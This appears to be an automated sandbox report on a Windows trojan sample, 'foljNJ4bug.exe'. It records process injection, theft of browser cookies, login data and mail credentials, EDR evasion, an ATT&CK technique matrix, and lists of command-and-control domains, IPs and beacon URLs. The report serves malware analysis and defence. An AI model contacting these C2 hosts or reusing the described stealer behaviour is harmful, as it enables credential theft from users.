            Source: C:\Windows\SysWOW64\sc.exeSection loaded: NULL target: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeThread register set: target process: 5672Jump to behavior
            Source: C:\Windows\SysWOW64\sc.exeThread APC queued: target process: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeJump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 306B008Jump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\foljNJ4bug.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\foljNJ4bug.exe"Jump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: YKSXcXcWryn.exe, 00000003.00000000.2198432491.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000003.00000002.4569880170.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000000.2342811001.0000000001200000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: foljNJ4bug.exe, YKSXcXcWryn.exe, 00000003.00000000.2198432491.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000003.00000002.4569880170.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000000.2342811001.0000000001200000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: YKSXcXcWryn.exe, 00000003.00000000.2198432491.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000003.00000002.4569880170.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000000.2342811001.0000000001200000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: YKSXcXcWryn.exe, 00000003.00000000.2198432491.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000003.00000002.4569880170.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000000.2342811001.0000000001200000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: foljNJ4bug.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4572880167.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4568347661.0000000002B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2274511503.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2274082509.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4568673306.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4568820851.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4570541782.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2275048061.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: foljNJ4bug.exeBinary or memory string: WIN_XP
            Source: foljNJ4bug.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: foljNJ4bug.exeBinary or memory string: WIN_XPe
            Source: foljNJ4bug.exeBinary or memory string: WIN_VISTA
            Source: foljNJ4bug.exeBinary or memory string: WIN_7
            Source: foljNJ4bug.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4572880167.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4568347661.0000000002B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2274511503.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2274082509.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4568673306.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4568820851.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4570541782.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2275048061.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            2
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Service Execution
            1
            Windows Service
            1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS16
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets141
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
            Windows Service
            1
            Masquerading
            Cached Domain Credentials2
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items412
            Process Injection
            2
            Valid Accounts
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
            Virtualization/Sandbox Evasion
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
            Access Token Manipulation
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
            Process Injection
            Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530706 Sample: foljNJ4bug.exe Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 28 www.takitoon.xyz 2->28 30 www.useanecdotenow.tech 2->30 32 21 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 5 other signatures 2->50 10 foljNJ4bug.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 YKSXcXcWryn.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 sc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 YKSXcXcWryn.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 patioprojex.africa 197.189.237.186, 61402, 61403, 61404 xneeloZA South Africa 22->34 36 www.gutpox.life 67.223.117.189, 61407, 61408, 61409 VIMRO-AS15189US United States 22->36 38 9 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            foljNJ4bug.exe52%VirustotalBrowse
            foljNJ4bug.exe71%ReversingLabsWin32.Trojan.Autoitinject
            foljNJ4bug.exe100%AviraHEUR/AGEN.1321293
            foljNJ4bug.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            webredir.vip.gandi.net
            217.70.184.50
            truetrue
              unknown
              rmgltd.services
              3.33.130.190
              truetrue
                unknown
                takitoon.xyz
                3.33.130.190
                truetrue
                  unknown
                  takeun.club
                  3.33.130.190
                  truetrue
                    unknown
                    www.tempmai.lol
                    45.33.18.44
                    truetrue
                      unknown
                      www.aaavvejibej.bond
                      172.67.181.150
                      truetrue
                        unknown
                        patioprojex.africa
                        197.189.237.186
                        truetrue
                          unknown
                          www.gutpox.life
                          67.223.117.189
                          truetrue
                            unknown
                            www.kx507981.shop
                            54.67.42.145
                            truetrue
                              unknown
                              www.crochetpets.online
                              208.91.197.27
                              truetrue
                                unknown
                                www.bayarcepat19.click
                                188.114.97.3
                                truetrue
                                  unknown
                                  myjiorooms.services
                                  3.33.130.190
                                  truetrue
                                    unknown
                                    www.shanhaiguan.net
                                    156.242.132.82
                                    truetrue
                                      unknown
                                      nng65.top
                                      38.47.233.65
                                      truetrue
                                        unknown
                                        www.useanecdotenow.tech
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.takitoon.xyz
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.ultraleap.net
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.turbonotes.app
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.rmgltd.services
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.myjiorooms.services
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    www.patioprojex.africa
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      www.takeun.club
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        www.nng65.top
                                                        unknown
                                                        unknowntrue
                                                          unknown
                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.aaavvejibej.bond/m3ct/?5vc=zEwq1iaMF/uCsqziz8qMUhXCXmUco/L+vi+T8f7QvA3w3jxbUYr6DIVUG7Wad/XDR1ZvfFtvoxN1EeB5BAcej8YfbKSiuNBAZGSPTmsYajwE5YNxObykffmIIzNg2h0GVq7a1DE=&lLYL=kvUXtrue
                                                            unknown
                                                            http://www.takitoon.xyz/4qpg/?lLYL=kvUX&5vc=7YL4gquCN0E55MFUOU9pAg/pZfkwLQQKii7X4zB1/APnuYQ63ytlc9rdDU84d9EdPhCMcrEauI5xN2RdLzEruIlUX3fWqfOqjWcwC1p6yjm3sUGyC92I8On0vrGkOogLmLiKp0c=true
                                                              unknown
                                                              http://www.gutpox.life/bcpd/?5vc=00X9d/BTKK5R5e14wWEt126s+mdVGBYlWg3KruQB0GNMBll6v3rooUlUxbesnPMHDrwLyGZxaHgZZw9MEvoNzTeh6b+sdgkolwxMs8g4smMKoeawjyQiJRB92JfMM9Rn76Nc6Cg=&lLYL=kvUXtrue
                                                                unknown
                                                                http://www.nng65.top/g9xe/?5vc=MLCfwq0OLzOW6QPmgLFQnuGoPPrQyzTDS43mRmpffLpQSwrMWSBFbGoKeLq/FK43j0+k/VozFS/nBlsWqz4m9kWG5HZt62rlPRgv7u+rlw8JrCSD2NF9WC2SMGJleFo1CnmOFq8=&lLYL=kvUXtrue
                                                                  unknown
                                                                  http://www.myjiorooms.services/7ts8/?lLYL=kvUX&5vc=VgfHXYqklmOf3gIY6JX4+MSwLZFx3fC4t3URmGvQc8lOLOm3On7tbGBltUCUb2EMakaNsP50tNqrd0nnNZuXCCSXzQ7vSeHOGGO1wR7Laf4A+YuB3YDb13HLVs/KWc3twln2EFc=true
                                                                    unknown
                                                                    http://www.gutpox.life/bcpd/true
                                                                      unknown
                                                                      http://www.aaavvejibej.bond/m3ct/true
                                                                        unknown
                                                                        http://www.myjiorooms.services/7ts8/true
                                                                          unknown
                                                                          http://www.rmgltd.services/4q0i/true
                                                                            unknown
                                                                            http://www.turbonotes.app/7u7b/true
                                                                              unknown
                                                                              http://www.takeun.club/ow7w/?lLYL=kvUX&5vc=p1G8XVp3dTmrBOooBHOazFGeIrxM1J3oyb4/irL+UWW2iE7BpWwBAaQNTChmqclkWYPZ2V3tJwkqHmUMbW57TcftwINdn5ScJT94TdCNnEqMkWAGcRU1jqFlvrtrVO/HPFIHZdo=true
                                                                                unknown
                                                                                http://www.takitoon.xyz/4qpg/true
                                                                                  unknown
                                                                                  http://www.nng65.top/g9xe/true
                                                                                    unknown
                                                                                    http://www.ultraleap.net/9iab/true
                                                                                      unknown
                                                                                      http://www.bayarcepat19.click/fxts/?5vc=KBrNmZFmj0ul2oD2qgnroh/wQ2h5AjW2d9F4abtF0F4CaovzTwTYRyu6DykZf8dcdN4xXWNYZBLXZ4+qzslzTuV7y9B6gd/Ri+hABrjyhRVbSEt0nKDUfa/P8q39BOk9hsMan7o=&lLYL=kvUXtrue
                                                                                        unknown
                                                                                        http://www.turbonotes.app/7u7b/?lLYL=kvUX&5vc=2Z5kGOkuv5pVGp5caE9S+AlLzK7psx26l1r4OVTTo/mJv8+h8gvJJdoe4aGwZK+fAJooQPvCRx2bg5uJuIXMrI8i6EsIC7ECcfl7eR40SkVxjNn20IyYqrUIILkrtqNDTrCWbBw=true
                                                                                          unknown
                                                                                          http://www.patioprojex.africa/x557/?5vc=giAstKbG1JvvSEHvPZxdSSM3KyfVinJMbmE6i5V8cuPr9HW8zP8h8UUcUfsu4P3tPpyGgBHfZyFCt865pXgydxC+b0QJblKsDInl9u5dqfz1OH+RWteaPpXHUBQMRwPVkFLc/Ks=&lLYL=kvUXtrue
                                                                                            unknown
                                                                                            http://www.crochetpets.online/8l0y/?5vc=gpZ7O9wJuofu6jQ+zhbQfshngqVv9cE5kPyoFYRIcR03yvbe/BOPGk6xXKz30nptSiLZCe/Z5fLwL00E8raoZSt1+2D0KaGk+ev1JjVnWNJk73VZkcb+ifONmJiX1s5MbYZXBXE=&lLYL=kvUXtrue
                                                                                              unknown
                                                                                              http://www.patioprojex.africa/x557/true
                                                                                                unknown
                                                                                                http://www.crochetpets.online/8l0y/true
                                                                                                  unknown
                                                                                                  http://www.shanhaiguan.net/54aa/?lLYL=kvUX&5vc=YMphRbBqYD1qziPfcxWfV7OUDSA3QU5FUkSnoqDZt26OzjZirNwjAGjBpWvuubqos1AuwzhTz+mW7CpJxDFhVa/HfUjNfzfl4NcBItZkd8PY3xDlIjidjox4juNb6YkC0urLz9Q=true
                                                                                                    unknown
                                                                                                    http://www.kx507981.shop/2i23/true
                                                                                                      unknown
                                                                                                      http://www.kx507981.shop/2i23/?5vc=bKA+uOpFda5dGdFXdnTLNkRmhJBOP9S0HCpQNG3UnGEkxT/oTZLAjGTvHx4TKdTffd9QN0N/OlpfyxtP6tcBddlohGt5l/spne/Xm9eGrkU+7BisppRJ0X6uxZ9HBJ4oDTdSaxo=&lLYL=kvUXtrue
                                                                                                        unknown
                                                                                                        http://www.ultraleap.net/9iab/?5vc=Y4kDenUp1gO2Q0jRiZUxMqowayno9Xsk2AlmB9dDBLZOc6V7t85yetNjHcmH7slMwyaAfgZ0o1D1+bSHqn/hHAccGgPOonKwLb4ZCbzMyRuUgcD/rdhA1bXMlxtgx1iShR1I/OE=&lLYL=kvUXtrue
                                                                                                          unknown
                                                                                                          http://www.takeun.club/ow7w/true
                                                                                                            unknown
                                                                                                            http://www.tempmai.lol/m2fa/true
                                                                                                              unknown
                                                                                                              http://www.bayarcepat19.click/fxts/true
                                                                                                                unknown
                                                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                https://duckduckgo.com/chrome_newtabsc.exe, 00000004.00000002.4574151848.0000000007E88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://dts.gnpge.comYKSXcXcWryn.exe, 00000008.00000002.4570830422.00000000046C2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://duckduckgo.com/ac/?q=sc.exe, 00000004.00000002.4574151848.0000000007E88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://whois.gandi.net/en/results?search=ultraleap.netsc.exe, 00000004.00000002.4571993110.00000000053FE000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.000000000439E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sc.exe, 00000004.00000002.4574151848.0000000007E88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://www70.tempmai.lol/YKSXcXcWryn.exe, 00000008.00000002.4570830422.0000000003D56000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsc.exe, 00000004.00000002.4574151848.0000000007E88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://www.crochetpets.online/sk-logabpstatus.php?a=N1hkU2g1d01yTW5xcHU0dEhSdTg5bTZpTnJKR2xVNFNMQ2hUsc.exe, 00000004.00000002.4571993110.0000000005722000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 00000004.00000002.4574024269.0000000006440000.00000004.00000800.00020000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.00000000046C2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://patioprojex.africa/x557/?5vc=giAstKbG1JvvSEHvPZxdSSM3KyfVinJMbmE6i5V8cuPr9HW8zP8h8UUcUfsu4P3tsc.exe, 00000004.00000002.4571993110.000000000476E000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.000000000370E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sc.exe, 00000004.00000002.4574151848.0000000007E88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.tempmai.lol/m2fa?gp=1&js=1&uuid=1728557616.0093649002&other_args=eyJ1cmkiOiAiL20yZmEiLCAisc.exe, 00000004.00000002.4571993110.0000000004DB6000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.0000000003D56000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            unknown
